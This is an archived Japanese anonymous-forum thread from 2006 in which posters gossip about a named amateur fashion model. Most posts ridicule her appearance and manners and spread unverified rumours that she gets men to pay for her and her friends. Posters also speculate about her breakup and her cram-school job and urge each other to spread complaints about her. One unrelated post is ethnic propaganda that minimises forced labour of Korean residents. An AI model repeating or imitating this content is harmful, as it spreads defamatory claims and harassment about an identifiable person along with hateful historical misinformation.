ただいま二股中。

296 :無名モデル:2006/12/07(木) 03:17:45 ID:???
>>293
よみましたよー
たしかあるひとの書き込みからいきなりアンチになりましたよね?
でもそれにしては豹変しすぎやなって・・・
まぁ知り合いでも同じ大学ですらもないのでそこまでかばう義理もないですけど
たぶん沙織ちゃんも見てるんやろねーこのスレ。

297 :無名モデル:2006/12/07(木) 13:43:33 ID:???
不思議ちゃん。何を考えてるかわからない。ドクモやりたくないんなら辞めたらいいのに。辞める勇気もないのに。

298 :無名モデル:2006/12/07(木) 16:30:53 ID:???
村上さんブログでも自慢好きが発揮されてるね…。そういうことするから嫌われてるのに。自分で自覚しなよ。

299 :無名モデル:2006/12/07(木) 22:46:41 ID:???
若干知り合い。
この間、誕生日だと騒いでうるさかったから、おめでとうメールした。
が、今現在返事のメールは来ていない。
普通はいちいち返事しないのかもしれないが、
自分含めて周囲の子はみんなありがとうメールくれるし、するので
どういう対応が常識的なのか知らないけど、つくづく不義理なやつだと思った。

300 :無名モデル:2006/12/07(木) 23:09:30 ID:???
>>299
うわーそれってヒドクない??
自分だったら嫌過ぎてまわりに言いふらしてしまうよ。
自分のことしか考えてなくて他人はおかまいなしの奴なんだから
そのくらいしてもおk。
お人よしにしてたら、利用されるよ、気をつけないと。
はかなげな見かけにしておいて、そういうことやってるヤツが一番危ない

301 :無名モデル:2006/12/07(木) 23:12:37 ID:???
性格や普段はしらんが見た目はそのへんの毒モとはちがうなって思う。へんに汚れてないというか…ほんま自然でかわいい。細いけど綺麗な細さやからこのコ着てるの全部良く見えるもん。ファッションかわいいやん。
ただ吉川しほに真似されてかわいそう

302 :無名モデル:2006/12/07(木) 23:31:17 ID:???
村上さんのブログのコメントで沙織さんはコメントを返信する人を選んでるのですか?って批判されてたね。
自分のファンかもしれないのに、よくそんなことできるね。自分を誰だと思っているの?調子乗るのもいいかげんにしなよ。
それともう22歳なんだから自分のこと沙織っていうのもやめた方がいいんじゃない?来年から一応社会人なんだし。

303 :無名モデル:2006/12/08(金) 00:24:40 ID:???
>>299
沙織、最低やな。
普通はあなたのように御礼を返信するのが正しいよ。
沙織が非常識なだけだから相手しない方いいよ。
善人ぶってるだけで、所詮そんなやつなんだよ。

304 :無名モデル:2006/12/08(金) 07:12:03 ID:???
沙織ちゃんも忙しかったんじゃない。
くるメールの量だってうちらとは比べもんにならんやろし。個人的にはめっちゃ顔タイプ。

305 :無名モデル:2006/12/08(金) 07:48:55 ID:agglt/N0
沙織ちゃんの進路は?

306 :無名モデル:2006/12/08(金) 09:39:09 ID:???
就職はせずにrosyを続けるみたい。

就活もしてないし、こんなやつに就職先なんかないやろ。

307 :無名モデル:2006/12/08(金) 11:40:50 ID:???
>>299
村上ってそういうやつだよ。
私も>>299さんの対応が普通だと思う。
他の読モとは違って‥‥みたいなこと言ってるけど人として最低やよ。
村上、自分に好意ある男に金貢がせてんだけど
自分の分だけじゃなくて友達のもせびってるのには引いたよ。

>>304
そういうのってメールの量の問題じゃないと思うけど‥‥人として。
あんな鏡とピンでくだらない遊びしてる暇あったら返事しろよって感じ。
顔はカワイイけど、最低限の礼儀もできなきゃこれから通用しないよ。
ちなみに本物、みんないうようにびっくりするくらい普通すぎてオーラ皆無。
なのに、ほんま周り意識してすごいからW

>>305
村上、「就活は沙織に合わなくて三日で辞めた」って周りには言ってるけど
結局どこの箸にも引っ掛からなかったんだよW
当たり前だよ、敬語どころか普通の言葉遣いもおかしいもん。
面接官の前で「沙織」「パパ・ママ」言うたって笑ってたけど、笑えへんわ。

308 :無名モデル:2006/12/08(金) 15:02:47 ID:???

昭和34年当時在日総数61万人
そのうち徴用(在日のいう強制連行)
で日本に来て日本にそのまま住み着いたのはたった245人だけ
他は自由意志で勝手に住み着いた連中

ttp://www.youtube.com/watch?v=nphQDygKRtQ
ttp://img2.echoo.jp/photo/blog_b/52019453ce69cd3536fa41c3fe15ee29.jpeg
(朝日新聞 1959年7月13日)

  ,j;;;;;j,. ---一、 `  ―--‐、_ l;;;;;;
 {;;;;;;ゝ T辷iフ i    f'辷jァ  !i;;;;;   
  ヾ;;;ハ    ノ       .::!lリ;;r゙    在日の方々はかわいそうな強制連行の被害者
   `Z;i   〈.,_..,.      ノ;;;;;;;;>     
   ,;ぇハ、 、_,.ー-、_',.    ,f゙: Y;;f      そんなふうに考えていた時期が
   〜''戈ヽ   `二´    r'´:::. `!    俺にもありました




309 :無名モデル:2006/12/08(金) 23:59:24 ID:???
というか、誕生日のメールの返事を私や私の周りの友達はもらったので返事もらってない
ていう書き込みすると正体ばれるよ??
ここ見てるらしいから・・・・

310 :無名モデル:2006/12/09(土) 02:15:43 ID:Nma4cUAz
>>309
あなた前にも書き込んでたね。
あなたは返事もらったのかもしれないけど、あなたの周りもほんとにもらってるの?
ふつう返事きたことを友達同士で報告しあったりなんてあまりしないと思うけど。
バレるとか言ってるけど、ビビらせたいだけでしょ?

311 :無名モデル:2006/12/09(土) 02:18:54 ID:???
>>292
もともとアンチも擁護もいたけど、擁護はスレから去って、アンチしか残ってないだけ。

312 :無名モデル:2006/12/09(土) 16:20:52 ID:???
沙織ちゃんが塾の講師やってるのってどこの塾なんだろ

313 :無名モデル:2006/12/09(土) 17:39:44 ID:???
地元の小さい塾。そのへんの子しか来てない。

314 :無名モデル:2006/12/15(金) 15:21:16 ID:???
『女の子って強くって優しくって』


ふーーーん。

315 :無名モデル:2006/12/15(金) 16:15:53 ID:???
敬語使えないくらいいいじゃない…若いんだし。
最初は敬語使ってたよー仲良くなってからタメ語になったけど、若いうちは敬語くらい許容範囲です。
何故なら可愛いから…いや、可愛いくて素直で好きだから。
因みに誰だって最初からギャルじゃないでしょうに……。
でもすっぴんでも可愛い…訳あってもう会えないんだけど本当に大好き。
さおりちゃん見ると自分がコケシかハニワっぽく見えて……
整形しようか考えちゃうし私が男だったら貢いでたかも……orz

316 :無名モデル:2006/12/16(土) 02:23:03 ID:???

おまいうざす

317 :無名モデル:2006/12/16(土) 12:27:57 ID:???
>敬語使えないくらいいいじゃない

世の中なめてるね。

318 :無名モデル:2006/12/16(土) 13:03:20 ID:???
ブログ更新しないからだんだんコメントする人も少なくなってきたね。
自業自得だよw

319 :無名モデル:2006/12/18(月) 07:18:09 ID:???
髪きったんだね。もしかして失恋?(安易な発想だけど)
しばらくブログ停滞してたときあったじゃん?もしかしたら彼氏となんかあったのかなー でいきなり髪切ってるしそれについて触れずだし…

320 :無名モデル:2006/12/18(月) 10:15:58 ID:DnaQyZYs
惹かれるなぁ♪

321 :無名モデル:2006/12/19(火) 08:12:08 ID:???
最近の更新では、彼氏とオソロって言ってたコラボのブレスつけてなくない?
やっぱり別れたのかな

322 :無名モデル:2006/12/19(火) 19:24:50 ID:kc7q5bjM
ブログできてた。
http://ameblo.jp/saorizm

323 :無名モデル:2006/12/19(火) 21:25:27 ID:???
↑沙織ちがい…

324 :無名モデル:2006/12/23(土) 11:31:11 ID:???
vivi載ってたけどブログってほんま写り良い事がよく分かった
他の毒モと並んだらカスみたいww他も大した事ないけど
ブログの写真は相当選んでるな〜
大して細いわけでもなくオシャレでもないし鼻くそやんw

325 :無名モデル:2006/12/23(土) 17:52:31 ID:???
まぁブログは自分撮りだからね。いいやつしか選んでないんじゃない?

326 :無名モデル:2006/12/25(月) 01:17:35 ID:/2NC6az+
てかブログと雑誌の写りの違いにワロタwwwww
詐欺師誕生w

327 :無名モデル:2006/12/25(月) 08:09:43 ID:???
南原に似てますね

328 :無名モデル:2006/12/25(月) 18:36:00 ID:???
顔のかんじちょっと華原朋美っぽい

329 :無名モデル:2006/12/25(月) 23:33:16 ID:???
てかほんと華のない顔・・・
だからいつまでたっても中途半端女

330 :無名モデル:2006/12/26(火) 14:31:20 ID:478VkpmQ
たまごっち人間て・・・

331 :無名モデル:2006/12/27(水) 13:33:40 ID:???
沙織ちゃんもうちょっとちゃんとお化粧したら??


71 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)